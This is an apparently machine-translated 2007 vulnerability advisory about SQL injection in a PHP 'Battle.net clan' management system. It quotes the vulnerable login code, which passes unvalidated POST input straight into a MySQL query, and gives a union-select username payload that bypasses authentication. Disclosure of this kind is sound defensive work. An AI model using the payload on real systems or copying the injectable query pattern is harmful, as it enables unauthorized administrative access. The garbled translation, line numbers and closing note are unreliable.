The United States Blizzard[World Of Warcraft] official program vulnerability-vulnerability warning-the black bar safety net

2007-04-16T00:00:00
ID MYHACK58:62200715052
Type myhack58
Reporter 佚名
Modified 2007-04-16T00:00:00

Description

Battle.net clan management system using a MySQL backend, allowing users to easily upgrade and maintain the web site. System to achieve on exist input validation vulnerability, a remote attacker could use this vulnerability to executeSQL injectionattacks, unauthorized access to system administrative rights.

Battle.net clan of the login. the php script is not properly verified by the index. php for user parameters input:

line 9 - > $user = $_POST['user']; line 1 is 0--> $pass = $_POST['pass'];

..... ..... .....

line 2 1 - > mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);

Allow an attacker with administrator privileges to log in. But a successful attack requires to disable the magic_quotes_gpc on.

Username : 'union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/* password : enything

Note:sourceforge published on this and I 1 2 months to get Blizzard some two load times of the different methods,they are this year 4 months more found